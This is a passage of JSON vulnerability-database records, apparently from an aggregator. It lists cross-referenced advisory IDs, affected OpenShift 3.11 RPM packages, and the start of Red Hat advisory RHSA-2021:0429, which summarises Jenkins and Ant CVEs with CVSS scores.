"GENTOO_GLSA-202007-34.NASL", "UBUNTU_USN-4380-1.NASL", "REDHAT-RHSA-2021-0429.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2020-1915.NASL", "JENKINS_2_274.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0719", "RHSA-2021:0423", "RHSA-2021:0039", "RHSA-2021:0282", "RHSA-2021:0037", "RHSA-2021:0034", "RHSA-2021:0038", "RHSA-2021:0429"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21604", "RH:CVE-2021-21606", "RH:CVE-2021-21611", "RH:CVE-2021-21609", "RH:CVE-2021-21602", "RH:CVE-2021-21608", "RH:CVE-2020-2305", "RH:CVE-2020-11979", "RH:CVE-2020-2308", "RH:CVE-2021-21603", "RH:CVE-2020-25658", "RH:CVE-2020-2307", "RH:CVE-2021-21605", "RH:CVE-2021-21607", "RH:CVE-2020-2306", "RH:CVE-2020-2304", "RH:CVE-2020-2309", "RH:CVE-2021-21610", "RH:CVE-2020-1945"]}, {"type": "cve", "idList": ["CVE-2021-21602", "CVE-2021-21609", "CVE-2021-21611", "CVE-2020-25658", "CVE-2021-21604", "CVE-2020-2309", "CVE-2021-21605", "CVE-2020-1945", "CVE-2020-2305", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2304", "CVE-2021-21603", "CVE-2021-21606", "CVE-2021-21610", "CVE-2021-21608", "CVE-2021-21607", "CVE-2020-2308", "CVE-2020-11979"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-25658", "UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "fedora", "idList": ["FEDORA:52396606732B", "FEDORA:569CE30E400B", "FEDORA:146FE30DD5E7", "FEDORA:88EAA30905CF", "FEDORA:046CF30C99A1", "FEDORA:6869030D3139", "FEDORA:28DBA30C999B", "FEDORA:2D51F60C28B2"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9", "GHSA-XRX6-FMXQ-RJJ2"]}, {"type": "photon", "idList": ["PHSA-2020-3.0-0099", "PHSA-2020-2.0-0247", "PHSA-2021-4.0-0036"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}], "modified": "2021-08-25T20:36:56", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-08-25T20:36:56", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-common-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-common"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-dockerregistry"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus-alertmanager"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus-node-exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.5-3.el7", "packageFilename": "python2-rsa-4.5-3.el7.noarch.rpm", "operator": "lt", "packageName": "python2-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-hypershift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-test-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-hypershift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-node"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt", "packageName": "atomic-openshift-excluder"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-sdn-ovs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.ppc64le.rpm", "operator": "lt", "packageName": "prometheus"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.src.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-dockerregistry"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.x86_64.rpm", "operator": "lt", "packageName": "haproxy18"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-tests"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-docs-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-docs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.noarch.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.src.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-3.11.394-1.git.1490.16ed375.el7.src.rpm", "operator": "lt", "packageName": "openshift-kuryr"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-1.8.28-1.el7.src.rpm", "operator": "lt", "packageName": "haproxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.src.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-template-service-broker"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "python2-kuryr-kubernetes-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "python2-kuryr-kubernetes"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog-svcat"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-master"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "golang-github-prometheus-prometheus-3.11.394-1.git.5026.2c9627f.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-prometheus"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-descheduler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-roles-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-roles"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.ppc64le.rpm", "operator": "lt", "packageName": "haproxy-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.x86_64.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-playbooks-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-playbooks"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-tests"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.src.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-pod"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-docker-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt", "packageName": "atomic-openshift-docker-excluder"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.src.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-master"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "golang-github-prometheus-node_exporter-3.11.394-1.git.1062.8adc4b8.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-node_exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-web-console"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-metrics-server"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.ppc64le.rpm", "operator": "lt", "packageName": "haproxy18"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "golang-github-prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.src.rpm", "operator": "lt", "packageName": "golang-github-prometheus-alertmanager"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift-cluster-autoscaler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-redistributable-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog-svcat"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-cni-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-cni"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.src.rpm", "operator": "lt", "packageName": "atomic-openshift"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus-node-exporter"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-enterprise-cluster-capacity"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-pod"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-enterprise-service-catalog"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.ppc64le.rpm", "operator": "lt", "packageName": "golang-github-openshift-oauth-proxy"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.x86_64.rpm", "operator": "lt", "packageName": "haproxy-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-node"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-controller-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-controller"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-template-service-broker"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-sdn-ovs"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-node-problem-detector"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.ppc64le.rpm", "operator": "lt", "packageName": "openshift-enterprise-autoheal"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.5-3.el7", "packageFilename": "python-rsa-4.5-3.el7.src.rpm", "operator": "lt", "packageName": "python-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.x86_64.rpm", "operator": "lt", "packageName": "prometheus-alertmanager"}], "vendorCvss": {"severity": "important"}, "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"]}, {"id": "RHSA-2021:0429", "hash": "c5208b7ce7022e4a862d09a58318d226", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0429) Important: OpenShift Container Platform 4.5.33 packages and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.5.33. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHSA-2021:0428\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-03-03T08:59:11", "modified": "2021-03-03T09:04:26", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": 